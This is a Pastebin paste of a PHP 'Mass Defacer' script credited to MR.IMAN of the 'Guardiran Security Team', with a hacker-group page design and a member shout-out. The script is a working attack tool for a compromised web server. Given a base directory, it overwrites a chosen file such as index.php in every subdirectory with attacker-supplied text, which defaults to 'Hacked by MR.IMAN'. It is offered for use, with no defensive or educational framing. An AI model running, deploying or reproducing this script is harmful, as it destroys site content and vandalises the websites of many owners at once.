Advertisement
dr-iman

Directory Mass Defacer

Jun 15th, 2017
171
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 4.22 KB | None | 0 0
  1.  <font color="green">
  2. Select Your Files :
  3.  
  4. <br>
  5. <html>
  6.   <style>
  7. body {    background: url(http://s7.picofile.com/file/8232976300/154x5s1.gif) center center no-repeat fixed;
  8.     background-size: 100%;
  9.     background-size: cover;
  10.     -webkit-background-size: cover;
  11.     -moz-background-size: cover;
  12.     -o-background-size: cover;
  13.     -ms-background-size: cover;
  14.  
  15. </style>
  16.  <script src=' type='text/javascript"></script>
  17. <body style='background-color:000000;'>
  18. <link href='http://fonts.googleapis.com/css?family=Orbitron' rel='stylesheet' type='text/css'>
  19. <link href='http://fonts.googleapis.com/css?family=Wallpoet' rel='stylesheet' type='text/css'>
  20. <link href='http://fonts.googleapis.com/css?family=Cherry+Swash' rel='stylesheet' type='text/css'>
  21. <link href='http://fonts.googleapis.com/css?family=Creepster' rel='stylesheet' type='text/css'>
  22. <link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'>
  23. <br><span class='wglow' style='font-
  24. family: Courier;'><b> </b></span><a href='target='blank'><class=.InfernaL' onclick='meow()'><b><span style='color:  RED;'></span></b></button></a>
  25. <center><font size='8' color='green' face='Wallpoet'> -=[Guardiran</font>  <font size='8' color='white' face='Wallpoet'>Security </font>  <font size='8' color='red' face='Wallpoet'>Team]=-</font>
  26. <br>
  27. <br>
  28. <center>
  29. <br><style type="text/css">
  30. *,body,div,p,span,h6{padding: 0px;margin: 0px;}body{background-color: #000000;}img{border-width: 0px;-ms-interpolation-mode: bicubic;}.wrapper{margin: 50px 0px 10px 0px;;}.wrapper p{color: #FF0000;padding:5px;}#box{color: #FF0000;text-shadow:1px 2px 3px #FF0000;}#love{color: #008000;text-shadow:1px 2px 3px #008000;}#guardiran{color: #FF0000;text-shadow:1px 2px 3px #FF0000;}#greetz{color: #FF9933;text-shadow:1px 2px 3px #FF9933;}#defacer{color: #FF0000;text-shadow:1px 2px 3px #FF0000;}.image{border-width: 0px;background-image: url('http://s6.picofile.com/file/8241433550/tilesash.jpg');background-repeat: repeat-x;background-position: center center;height: 266px;width: 100%;}#music{padding: 20px 0px 0px 20px}/* Coding by: MR.IMAN */
  31. </style><center>
  32. <div class="image"><img src="http://s6.picofile.com/file/8242732618/gi.png" height="300" width="300"></div>
  33.  <?php
  34. echo "<title>Mass Defacer - By MR.IMAN</title>";
  35. echo "<center><form method='POST'>";
  36. echo "Base Dir : <input type='text' name='base_dir' size='45' value='".getcwd ()."'><br><br>";
  37. echo "File Name : <input type='text' name='file_name' value='index.php'><br><br>";
  38. echo "Your Index : <br><textarea style='width: 785px; height: 330px;' name='index'>Hacked by MR.IMAN</textarea><br>";
  39. echo "<input type='submit' value='Start'></form></center>";
  40.  
  41. if (isset ($_POST['base_dir']))
  42. {
  43.     if (!file_exists ($_POST['base_dir']))
  44.         die ($_POST['base_dir']." Not Found !<br>");
  45.  
  46.     if (!is_dir ($_POST['base_dir']))
  47.         die ($_POST['base_dir']." Is Not A Directory !<br>");
  48.  
  49.     @chdir ($_POST['base_dir']) or die ("Cannot Open Directory");
  50.  
  51.     $files = @scandir ($_POST['base_dir']) or die ("oohhh shet<br>");
  52.  
  53.     foreach ($files as $file):
  54.         if ($file != "." && $file != ".." && @filetype ($file) == "dir")
  55.         {
  56.             $index = getcwd ()."/".$file."/".$_POST['file_name'];
  57.             if (@file_put_contents ($index, $_POST['index']))
  58.                 echo "$index&nbsp&nbsp&nbsp&nbsp<span style='color: green'>OK</span><br>";
  59.         }
  60.     endforeach;
  61. }
  62.  
  63. ?>
  64. <br>
  65. <br>
  66. <script type="text/javascript" src="http://gc.kis.scr.kaspersky-labs.com/1B74BD89-2A22-4B93-B451-1C9E1052A0EC/main.js" charset="UTF-8"></script></head><body><center><font style="text-shadow: 0px 0px 4px lime, 0px 0px 2px lime, 0px 0px 4px lime;" face="impact" color="black" size="5">Coded By MR.IMAN 2016-2018~~Y!D: demon.hacker37</font></center>
  67. <br>
  68. <br>
  69. <font face="ARIALBLACK" color="RED">
  70. <footer id="det" style="position:fixed; left:0px; right:0px; bottom:0px; background:rgb(0,0,0); text-align:center; border-top: 0px solid #white; border-bottom: 0px solid #white"><font color=#ff0000 size=2 face="Tahoma"><font color="RED">
  71. <b>We Are: </b></font><marquee scrollamount="5" scrolldelay="50" width="80%"><b><font color="white">
  72. C0d3!Nj3ct!0N | REX | MR.IMAN | GrYpHoN | alizombie | ColEctOR | MRSEZAR | DangerBoY And All Member's Guardiran Security Team</b></marquee> </font></footer>
  73.  
  74. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement